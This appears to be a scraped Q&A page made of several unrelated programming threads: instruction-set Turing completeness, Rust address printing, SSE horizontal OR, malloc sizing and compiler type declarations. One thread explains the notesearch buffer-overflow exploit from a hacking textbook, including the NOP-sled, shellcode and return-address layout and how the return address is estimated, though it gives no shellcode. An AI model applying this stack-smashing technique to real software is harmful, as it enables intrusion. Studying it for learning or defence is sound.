Is the following hypothetical instruction set Turing complete? - instruction-set

I have devised a hypothetical instruction set that I believe is Turing-complete. I cannot think of any computational operation that this instruction set is not able to complete. I would just like to verify that this hypothetical instruction set is indeed Turing-complete.
Registers
IP = Instruction Pointer
FL = Flags
Memory
Von Neumann
Other Info
Instructions have two forms (The conditional/immediate jumps being the outliers):
Acting on memory using a scalar
Acting on memory using other memory
All instructions act on unsigned integers of a fixed size
Each instruction consists of a one-byte opcode with three trailing one-byte arguments (not all arguments must be used).
Assume a byte is able to hold any memory address
Instructions
Moving = MOV
Basic Arithmetic = ADD, SUB, MUL, DIV, REM
Binary Logic = AND, NOT, OR, NOR, XOR, XNOR, NAND, SHR, SHL
Comparison = CMP (this instruction sets the flags (excluding the unsigned integer overflow flag) by comparing two values)
Conditional Jumps = JMP, various conditional jumps based on the flags
Flags
"Unsigned Integer Overflow"
">"
"<"
">="
"<="
"=/="
"="

Related

Why are printed memory addresses in Rust a mix of both 40-bit and 48-bit addresses?

I'm trying to understand the way Rust deals with memory and I've a little program that prints some memory addresses:
fn main() {
let a = &&&5;
let x = 1;
println!(" {:p}", &x);
println!(" {:p} \n {:p} \n {:p} \n {:p}", &&&a, &&a, &a, a);
}
This prints the following (varies for different runs):
0x235d0ff61c
0x235d0ff710
0x235d0ff728
0x235d0ff610
0x7ff793f4c310
This is actually a mix of both 40-bit and 48-bit addresses. Why this mix? Also, can somebody please tell me why the addresses (2, 3, 4) do not fall in locations separated by 8-bytes (since std::mem::size_of_val(&a) gives 8)? I'm running Windows 10 on an AMD x-64 processor (Phenom || X4) with 24GB RAM.
All the addresses do have the same size, Rust is just not printing trailing 0-digits.
The actual memory layout is an implementation detail of your OS, but the reason that a prints a location in a different memory area than all the other variables is, that a actually lives in your loaded binary, because it is a value that can already be calculated by the compiler. All the other variables are calculated at runtime and live on the stack.
See the compilation result on https://godbolt.org/z/kzSrDr:
.L__unnamed_4 contains the value 5; .L__unnamed_5, .L__unnamed_6 and .L__unnamed_1 are &5 &&5 and &&&5.
So .L__unnamed_1 is what on your system is at 0x7ff793f4c310. While 0x235d0ff??? is on your stack and calculated in the red and blue areas of the code.
This is actually a mix of both 40-bit and 48-bit addresses. Why this mix?
It's not really a mix, Rust just doesn't display leading zeroes. It's really about where the OS maps the various components of the program (data, bss, heap and stack) in the address space.
Also, can somebody please tell me why the addresses (2, 3, 4) do not fall in locations separated by 8-bytes (since std::mem::size_of_val(&a) gives 8)?
Because println! is a macro which expands to a bunch of stuff in the stackframe, so your values are not defined next to one another in the frame final code (https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=5b812bf11e51461285f51f95dd79236b). Though even if they were there'd be no guarantee the compiler wouldn't e.g. be reusing now-dead memory to save up on frame size.

Check that at least 1 element is true in each of multiple vectors of compare results - horizontal OR then AND

I'm looking for an SSE Bitwise OR between components of same vector. (Editor's note: this is potentially an X-Y problem, see below for the real comparison logic.)
I am porting some SIMD logic from SPU intrinsics. It has an instruction
spu_orx(a)
Which according to the docs
spu_orx: OR word across d = spu_orx(a) The four word elements of
vector a are logically Ored. The result is returned in word element 0
of vector d. All other elements (1,2,3) of d are assigned a value of
zero.
How can I do that with SSE 2 - 4 involving minimum instruction? _mm_or_ps is what I got here.
UPDATE:
Here is the scenario from SPU based code:
qword res = spu_orx(spu_or(spu_fcgt(x, y), spu_fcgt(z, w)))
So it first ORs two 'greater' comparisons, then ORs its result.
Later couples of those results are ANDed to get final comparison value.
This is effectively doing (A||B||C||D||E||F||G||H) && (I||J||K||L||M||N||O||P) && ... where A..D are the 4x 32-bit elements of the fcgt(x,y) and so on.
Obviously vertical _mm_or_ps of _mm_cmp_ps results is a good way to reduce down to 1 vector, but then what? Shuffle + OR, or something else?
UPDATE 1
Regarding "but then what?"
I perform
qword res = spu_orx(spu_or(spu_fcgt(x, y), spu_fcgt(z, w)))
On SPU it goes like this:
qword aRes = si_and(res, res1);
qword aRes1 = si_and(aRes, res2);
qword aRes2 = si_and(aRes1 , res3);
return si_to_uint(aRes2 );
several times on different inputs,then AND those all into a single result,which is finally cast to integer 0 or 1 (false/true test)
SSE4.1 PTEST bool any_nonzero = !_mm_testz_si128(v,v);
That would be a good way to horizontal OR + booleanize a vector into a 0/1 integer. It will compile to multiple instructions, and ptest same,same is 2 uops on its own. But once you have the result as a scalar integer, scalar AND is even cheaper than any vector instruction, and you can branch on the result directly because it sets integer flags.
#include <immintrin.h>
bool any_nonzero_bit(__m128i v) {
return !_mm_testz_si128(v,v);
}
On Godbolt with gcc9.1 -O3 -march=nehalem:
any_nonzero(long long __vector(2)):
ptest xmm0, xmm0 # 2 uops
setne al # 1 uop with false dep on old value of RAX
ret
This is only 3 uops on Intel for a horizontal OR into a single bit in an integer register. AMD Ryzen ptest is only 1 uop so it's even better.
The only risk here is if gcc or clang creates false dependencies by not xor-zeroing eax before doing a setcc into AL. Usually gcc is pretty fanatical about spending extra uops to break false dependencies so I don't know why it doesn't here. (I did check with -march=skylake and -mtune=generic in case it was relying on Nehalem partial-register renaming for -march=nehalem. Even -march=znver1 didn't get it to xor-zero EAX before the ptest.)
It would be nice if we could avoid the _mm_or_ps and have PTEST do all the work. But even if we consider inverting the comparisons, the vertical-AND / horizontal-OR behaviour doesn't let us check something about all 8 elements of 2 vectors, or about any of those 8 elements.
e.g. Can PTEST be used to test if two registers are both zero or some other condition?
// NOT USEFUL
// 1 if all the vertical pairs AND to zero.
// but 0 if even one vertical AND result is non-zero
_mm_testz_si128( _mm_castps_si128(_mm_cmpngt_ps(x,y)),
_mm_castps_si128(_mm_cmpngt_ps(z,w)));
I mention this only to rule it out and save you the trouble of considering this optimization idea. (#chtz suggested it in comments. Inverting the comparison is a good idea that can be useful for other ways of doing things.)
Without SSE4.1 / delaying the horizontal OR
We might be able to delay horizontal ORing / booleanizing until after combining some results from multiple vectors. This makes combining more expensive (imul or something), but saves 2 uops in the vector -> integer stage vs. PTEST.
x86 has cheap vector mask->integer bitmap with _mm_movemask_ps. Especially if you ultimately want to branch on the result, this might be a good idea. (But x86 doesn't have a || instruction that booleanizes its inputs either so you can't just & the movemask results).
One thing you can do is integer multiply movemask results: x * y is non-zero iff both inputs are non-zero. Unlike x & y which can be false for 0b0101 &0b1010for example. (Our inputs are 4-bit movemask results andunsigned` is 32-bit so we have some room before we overflow). AMD Bulldozer family has an integer multiply that isn't fully pipelined so this could be a bottleneck on old AMD CPUs. Using just 32-bit integers is also good for some low-power CPUs with slow 64-bit multiply.
This might be good if throughput is more of a bottleneck than latency, although movmskps can only run on one port.
I'm not sure if there are any cheaper integer operations that let us recover the logical-AND result later. Adding doesn't work; the result is non-zero even if only one of the inputs was non-zero. Concatenating the bits together (shift+or) is also of course like an OR if we eventually just test for any non-zero bit. We can't just bitwise AND because 2 & 1 == 0, unlike 2 && 1.
Keeping it in the vector domain
Horizontal OR of 4 elements takes multiple steps.
The obvious way is _mm_movehl_ps + OR, then another shuffle+OR. (See Fastest way to do horizontal float vector sum on x86 but replace _mm_add_ps with _mm_or_ps)
But since we don't actually need an exact bitwise-OR when our inputs are compare results, we just care if any element is non-zero. We can and should think of the vectors as integer, and look at integer instructions like 64-bit element ==. One 64-bit element covers/aliases two 32-bit elements.
__m128i cmp = _mm_castps_si128(cmpps_result); // reinterpret: zero instructions
// SSE4.1 pcmpeqq 64-bit integer elements
__m128i cmp64 = _mm_cmpeq_epi64(cmp, _mm_setzero_si128()); // -1 if both elements were zero, otherwise 0
__m128i swap = _mm_shuffle_epi32(cmp64, _MM_SHUFFLE(1,0, 3,2)); // copy and swap, no movdqa instruction needed even without AVX
__m128i bothzero = _mm_and_si128(cmp64, swap); // both halves have the full result
After this logical inversion, ORing together multiple bothzero results will give you the AND of multiple conditions you're looking for.
Alternatively, SSE4.1 _mm_minpos_epu16(cmp64) (phminposuw) will tell us in 1 uop (but 5 cycle latency) if either qword is zero. It will place either 0 or 0xFFFF in the lowest word (16 bits) of the result in this case.
If we inverted the original compares, we could use phminposuw on that (without pcmpeqq) to check if any are zero. So basically a horizontal AND across the whole vector. (Assuming that it's elements of 0 / -1). I think that's a useful result for inverted inputs. (And saves us from using _mm_xor_si128 to flip the bits).
An alternative to pcmpeqq (_mm_cmpeq_epi64) would be SSE2 psadbw against a zeroed vector to get 0 or non-zero results in the bottom of each 64-bit element. It won't be a mask, though, it's 0xFF * 8. Still, it's always that or 0 so you can still AND it. And it doesn't invert.

Why does allocated memory is different than the size of the string?

Please consider the following code:
char **ptr;
str = malloc(sizeof(char *) * 3); // Allocates enough memory for 3 char pointers
str[0] = malloc(sizeof(char) * 24);
str[1] = malloc(sizeof(char) * 25);
str[2] = malloc(sizeof(char) * 25);
When I use some printf to print the memory adresses of each pointer:
printf("str[0] = '%p'\nstr[1] = '%p'\nstr[2] = '%p'\n", str[0], str[1], str[2]);
I get this output:
str[0] = '0x1254030'
str[1] = '0x1254050'
str[2] = '0x1254080'
I expected the number corresponding to the second adress to be the sum of the number corresponding to the first one, and 24, which corresponds to the size of the string str[0] in bytes (since a char has a size of 1 byte). I expected the number corresponding to the second adress to be 0x1254047, considering that this number is expressed in base 16 (0123456789abcdef).
It seems to me that I spotted a pattern: from 24 characters in a string, for every 16 more characters contained in it, the memory used is 16 bytes larger. For example, a 45 characters long string uses 64 bytes of memory, a 77 characters long string uses 80 bytes of memory, and a 150 characters long string uses 160 bytes of memory.
Here is an illustration of the pattern:
I would like to understand why the memory allocated isn't equal to the size of the string. Why does it follow this pattern?
There at least two reasons malloc() may return memory in the manner you've noted.
Efficiency and peformance. By returning blocks of memory in only a small set of actual sizes, a request for memory is much more likely to find an already-existing block of memory that can be used, or wind up producing a block of memory that can be easily reused in the future. This will make the request return faster and has the side effect of limiting memory fragmentation.
Implications arising from the memory alignment requirements 7.22.3 Memory management functions of the C Standard states "The order and contiguity of storage allocated by successive calls to the
aligned_alloc, calloc,
malloc, and
realloc functions is unspecified. The
pointer returned if the allocation succeeds is suitably aligned so that it may be assigned to
a pointer to any type of object with a fundamental alignment requirement ..." Note the italicized part. Since the malloc() implementation has no knowledge of what the memory is to be used for, the memory returned has to be suitably aligned for any possible use. This usually means 8- or 16-byte alignment, depending on the platform.
Three reasons:
(1) The string "ABC" contains 4 characters, because every string in C has to have a terminating '\0'.
(2) Many processors have memory address alignment issues that make it most efficient when any block allocated by malloc() starts on an address that is a multiple of 4, or 8, or whatever the "natural" memory size is.
(3) The malloc() function itself requires some memory to store information about what has been allocated where, so that free() knows what to do.

The art of exploitation - exploit_notesearch.c

i've got a question regarding the exploit_notesearch program.
This program is only used to create a command string we finally call with the system() function to exploit the notesearch program that contains a buffer overflow vulnerability.
The commandstr looks like this:
./notesearch Nop-block|shellcode|repeated ret(will jump in nop block).
Now the actual question:
The ret-adress is calculated in the exploit_notesearch program by the line:
ret = (unsigned int) &i-offset;
So why can we use the address of the i-variable that is quite at the bottom of the main-stackframe of the exploit_notesearch program to calculate the ret address that will be saved in an overflowing buffer in the notesearch program itself ,so in an completely different stackframe, and has to contain an address in the nop block(which is in the same buffer).
that will be saved in an overflowing buffer in the notesearch program itself ,so in an completely different stackframe
As long as the system uses virtual memory, another process will be created by system() for the vulnerable program, and assuming that there is no stack randomization,
both processes will have almost identical values of esp (as well as offset) when their main() functions will start, given that the exploit was compiled on the attacked machine (i.e. with vulnerable notesearch).
The address of variable i was chosen just to give an idea about where the frame base is. We could use this instead:
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(){
esp = sp();
ret = esp - offset;
//the rest part of main()
}
Because the variable i will be located on relatively constant distance from esp, we can use &i instead of esp, it doesn't matter much.
It would be much more difficult to get an approximate value for ret if the system did not use virtual memory.
the stack is allocated in a way as first in last out approach. The location of i variable is somewhere on the top and lets assume that it is 0x200, and the return address is located in a lower address 0x180 so in order to determine the where about to put the return address and yet to leave some space for the shellcode, the attacker must get the difference, which is: 0x200 - 0x180 = 0x80 (128), so he will break that down as follows, ++, the return address is 4 bytes so, we have only 48 bytes we left before reaching the segmentation. that is how it is calculated and the location i give approximate reference point.

compilers - Instruction Selection for type declarations in AST

I'm learning compilers and creating a code generator for a simple language that deals with two types: characters and integers.
After the user input has been scanned by the scanner and then parsed by the parser, I get an AST representation of the input. I have made a code generation for an even simpler language which only processes expressions with integers, operators and variables.
However with this new language I sometimes get a subtree for a type declaration, like this:
(IS TYPE (x) (INT))
which says x is of type INT.
Should there be a case in my code generator which deals with these type declarations? Or is this simply for the semantic analyzer to type check, so I should just assume the types have been checked and ignore this part of the tree and simply assign the value for x?
Both situations are possible, you need to describe more about your language, to see if you really need to add that feature to your code generator, or skip it as unnecessary, and avoid extra work with this difficult and interesting topic of designing a programming language.
Is you "code generator" a program that recieves as an input code in a programming language (maybe small one) and outputs code in another programming language (maybe small one) ?
This tool is usually called a "translator".
Is you "code generator" a program that receive as an input a programming language and outputs assembler / bytecode like programming language ?
This tool is usually called a "compiler".
Note: "pile" is a synonym for "stack".
Usually an A.S.T., stores the type of an operation, or function call. Example, in c:
...
int a = 3;
int b = 5;
float c = (float)(a * b);
...
The last line, generates an A.S.T. similar to this, (skip A.S.T. for other lines):
..................................................................
..................................................................
......................+--------------+............................
......................| [root] |............................
......................| (no type) = |............................
......................+------+-------+............................
.............................|....................................
.................+-----------+------------+.......................
.................|........................|.......................
...........+-----+-----+....+-------------+-------------+.........
...........| (int) c |....| (float) (cast operation) |.........
...........+-----------+....+-------------+-------------+.........
..........................................|.......................
....................................+-----+-----+.................
....................................| (int) () |.................
....................................+-----+-----+.................
..........................................|.......................
....................................+-----+-----+.................
....................................| (int) * |.................
....................................+-----+-----+.................
..........................................|.......................
..............................+-----------+-----------+...........
..............................|.......................|...........
........................+-----+-----+...........+-----+-----+.....
........................| (int) a |...........| (float) b |.....
........................+-----------+...........+-----------+.....
..................................................................
..................................................................
Note that the "(float)" cast its like an operator or a function,
similar to your question.
Good Luck.
If this is a declaration
(IS TYPE (x) (INT))
then x should be laid out in memory. In the case of C and automatic variables, local auto variables are allocated on stack. To allocate needed size of stack you should know sizes of all local vars and sizes are from types.
If this variable is stored in a register, you should select a register of needed size (think about x86 with: AL, AX, EAX, RAX - the same register with different sizes), if your target has such.
Also, type is needed when there is an ambiguous operation in AST, which can operate on different data sizes (e.g. char, short, int - or 8-bit, 16-bit, 32-bit, etc). And for some assemblers, size of data is encoded into instruction itself; so codegen should remember sizes of variables.
Or, if the type of operation was not recorded in AST, the ADD:
(ADD (x) (y))
may mean both float and int additions (ADD or FADD instructions), so types of x and y are needed in codegen to select right variant.

Resources